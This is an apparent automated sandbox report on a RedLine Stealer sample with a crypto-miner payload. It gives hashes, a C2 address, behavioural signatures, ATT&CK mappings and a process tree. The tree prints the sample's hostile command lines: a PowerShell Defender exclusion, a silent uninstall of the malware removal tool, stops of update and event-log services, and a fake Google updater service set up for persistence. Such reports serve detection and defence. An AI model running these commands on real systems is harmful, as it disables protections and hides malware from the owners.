Analysis
max time kernel: 292s
max time network: 294s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 09-05-2024 23:31
Static task: static1
Behavioral task: behavioral1
  Sample: cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe
  Resource: win7-20240220-en
Behavioral task: behavioral2
  Sample: cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe
  Resource: win10-20240404-en
General
Target: cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe
Size: 462KB
MD5: b1910535419200a891f5c2a827d7b4e0
SHA1: 7c6b9a90802e3b5897c2fc6a70ebdb6de93548c6
SHA256: cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba
SHA512: 0ec4ff629358bdf79ee029ffc21b0093fa07f09c8a43f5d45dc0aeb4a960f87c3fc731b155a6032f2d2b7a1890fa7632f30fcede40e9d79a8f35e33442dca1b5
SSDEEP: 12288:S3/SNRR4lpxJLeURhAYmVYujbsqboi3VfygKU:S63Glp7Lj3Bujbsq1+
Malware Config
Extracted
Family: redline
Botnet: LogsDiller Cloud (TG: @logsdillabot)
C2: 5.42.65.77:6541
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
behavioral2/memory/3748-0-0x0000000000400000-0x0000000000452000-memory.dmp (yara rule: family_redline)
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
fie.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
updater.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
XMRig Miner payload 16 IoCs
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
PID 1320 powershell.exe
PID 4232 powershell.exe
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
fie.exe: File created C:\Windows\system32\drivers\etc\hosts
updater.exe: File created C:\Windows\system32\drivers\etc\hosts
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
fie.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
fie.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
updater.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
updater.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
Executes dropped EXE 2 IoCs
Processes:
PID 2384 fie.exe
PID 4832 updater.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled
Processes:
fie.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
updater.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Drops file in System32 directory 4 IoCs
Processes:
fie.exe: File opened for modification C:\Windows\system32\MRT.exe
powershell.exe: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
powershell.exe: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
updater.exe: File opened for modification C:\Windows\system32\MRT.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
PID 2384 fie.exe
PID 4832 updater.exe
Suspicious use of SetThreadContext 3 IoCs
Processes:
PID 4780 (cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe) set thread context of PID 3748 (RegAsm.exe)
PID 4832 (updater.exe) set thread context of PID 3892 (conhost.exe)
PID 4832 (updater.exe) set thread context of PID 652 (explorer.exe)
Launches sc.exe 14 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exe PIDs: 2084, 1708, 4556, 2152, 340, 3408, 4300, 5088, 1068, 912, 1832, 5092, 2132, 5032
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 47 IoCs
Modifies system certificate store
Processes:
RegAsm.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
RegAsm.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 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
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 53 IoCs
Suspicious use of WriteProcessMemory 28 IoCs
Processes

(depth 1) C:\Users\Admin\AppData\Local\Temp\cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID: 4780

  (depth 2) C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 3748

    (depth 3) C:\Users\Admin\AppData\Local\Temp\fie.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\fie.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Drops file in Drivers directory
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Checks whether UAC is enabled
      - Drops file in System32 directory
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
      PID: 2384

      (depth 4) C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1320

      (depth 4) C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        - Suspicious use of WriteProcessMemory
        PID: 4772

        (depth 5) C:\Windows\system32\wusa.exe
          command line: wusa /uninstall /kb:890830 /quiet /norestart
          PID: 592

      (depth 4) C:\Windows\system32\sc.exe
        command line: C:\Windows\system32\sc.exe stop UsoSvc
        - Launches sc.exe
        PID: 912

      (depth 4) C:\Windows\system32\sc.exe
        command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
        - Launches sc.exe
        PID: 1068

      (depth 4) C:\Windows\system32\sc.exe
        command line: C:\Windows\system32\sc.exe stop wuauserv
        - Launches sc.exe
        PID: 5032

      (depth 4) C:\Windows\system32\sc.exe
        command line: C:\Windows\system32\sc.exe stop bits
        - Launches sc.exe
        PID: 1832

      (depth 4) C:\Windows\system32\sc.exe
        command line: C:\Windows\system32\sc.exe stop dosvc
        - Launches sc.exe
        PID: 5088

      (depth 4) C:\Windows\system32\powercfg.exe
        command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
        PID: 4324

      (depth 4) C:\Windows\system32\powercfg.exe
        command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
        PID: 4248

      (depth 4) C:\Windows\system32\powercfg.exe
        command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
        PID: 4876

      (depth 4) C:\Windows\system32\powercfg.exe
        command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
        PID: 4516

      (depth 4) C:\Windows\system32\sc.exe
        command line: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
        - Launches sc.exe
        PID: 340

      (depth 4) C:\Windows\system32\sc.exe
        command line: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
        - Launches sc.exe
        PID: 4300

      (depth 4) C:\Windows\system32\sc.exe
        command line: C:\Windows\system32\sc.exe stop eventlog
        - Launches sc.exe
        PID: 2084

      (depth 4) C:\Windows\system32\sc.exe
        command line: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        - Launches sc.exe
        PID: 3408

(depth 1) C:\ProgramData\Google\Chrome\updater.exe
  command line: C:\ProgramData\Google\Chrome\updater.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 4832

  (depth 2) C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 4232

  (depth 2) C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    - Suspicious use of WriteProcessMemory
    PID: 3572

    (depth 3) C:\Windows\system32\wusa.exe
      command line: wusa /uninstall /kb:890830 /quiet /norestart
      PID: 3600

  (depth 2) C:\Windows\system32\sc.exe
    command line: C:\Windows\system32\sc.exe stop UsoSvc
    - Launches sc.exe
    PID: 2132

  (depth 2) C:\Windows\system32\sc.exe
    command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
    - Launches sc.exe
    PID: 2152

  (depth 2) C:\Windows\system32\sc.exe
    command line: C:\Windows\system32\sc.exe stop wuauserv
    - Launches sc.exe
    PID: 5092

  (depth 2) C:\Windows\system32\sc.exe
    command line: C:\Windows\system32\sc.exe stop bits
    - Launches sc.exe
    PID: 4556

  (depth 2) C:\Windows\system32\sc.exe
    command line: C:\Windows\system32\sc.exe stop dosvc
    - Launches sc.exe
    PID: 1708

  (depth 2) C:\Windows\system32\powercfg.exe
    command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    - Suspicious use of AdjustPrivilegeToken
    PID: 1072

  (depth 2) C:\Windows\system32\powercfg.exe
    command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    - Suspicious use of AdjustPrivilegeToken
    PID: 5068

  (depth 2) C:\Windows\system32\powercfg.exe
    command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    - Suspicious use of AdjustPrivilegeToken
    PID: 2172

  (depth 2) C:\Windows\system32\powercfg.exe
    command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    - Suspicious use of AdjustPrivilegeToken
    PID: 592

  (depth 2) C:\Windows\system32\conhost.exe
    command line: C:\Windows\system32\conhost.exe
    PID: 3892

  (depth 2) C:\Windows\explorer.exe
    command line: explorer.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 652
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  System Services (2)
    Service Execution (2)
Defense Evasion
  Impair Defenses (1)
  Modify Registry (1)
  Subvert Trust Controls (1)
    Install Root Certificate (1)
  Virtualization/Sandbox Evasion (1)